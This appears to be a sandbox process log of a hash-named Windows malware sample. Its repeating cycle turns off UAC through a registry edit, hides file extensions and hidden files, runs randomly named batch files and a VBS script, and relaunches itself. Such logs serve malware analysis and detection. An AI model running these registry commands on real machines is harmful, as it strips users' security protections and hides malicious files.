reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qYIUUokg.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\CAsIwIAU.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\hmMcsoMM.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DKIoIsUk.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xOkkAsIM.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BMggQgME.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\KKkIkgYs.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\GoEsoYMk.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\UWkocwAI.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\OqEoIUow.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BiswsQYc.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xmcIIwII.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\pMQkUswo.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\aqYYsUAM.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YSUkIwoE.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\KokQcgAo.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\IIEkUAIQ.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RwcEkUsk.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vUIkMckA.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

